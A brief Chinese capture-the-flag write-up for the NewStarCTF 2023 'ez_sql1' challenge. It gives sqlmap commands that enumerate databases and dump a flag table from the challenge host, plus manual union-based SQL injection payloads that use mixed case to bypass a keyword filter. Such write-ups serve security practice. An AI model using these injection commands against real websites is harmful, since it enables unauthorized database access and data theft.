[NewStarCTF 2023 公开赛道]ez_sql1 【sqlmap使用/大小写绕过】
题目:
发现id处可以sql注入:
虽然输入id=1';show databases;#没什么回显,但是知道这里是字符型注入了
这次利用sqlmap注入
--dbs:列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs
--current-db:当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db
显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables
--dump:显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump
其他手动SQL注入方法
利用大小写绕过
/?id=1' Order by 5 --+/?id=1' Union SELect 1,version(),user(),database(),5 --+
?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+